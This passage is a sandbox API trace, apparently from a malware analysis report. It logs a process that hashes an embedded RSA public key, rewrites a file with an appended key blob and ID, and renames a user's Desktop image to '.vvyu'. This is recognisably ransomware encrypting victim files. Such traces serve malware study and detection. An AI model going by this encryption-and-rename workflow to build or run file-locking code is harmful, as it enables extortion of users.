[0184.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.289] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.289] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xd8e5, lpOverlapped=0x0) returned 1 [0184.289] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.289] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.289] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.289] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.290] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.290] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.290] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.290] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.290] GetLastError () returned 0x0 [0184.291] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.291] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.291] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.292] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.292] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd8f0) returned 0x2d43778 [0184.292] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312e8 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.293] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e900 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.297] GetCurrentThreadId () returned 0x264 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36958 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.298] GetCurrentThreadId () returned 0x264 [0184.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.308] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xd8e0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xd8e0, lpOverlapped=0x0) returned 1 [0184.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.310] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd8e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.310] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.311] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.311] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.311] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.312] CloseHandle (hObject=0x584) returned 1 [0184.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.314] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\_gEmDK.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\_gemdk.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\_gEmDK.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\_gemdk.jpg.vvyu")) returned 1 [0184.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.327] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: 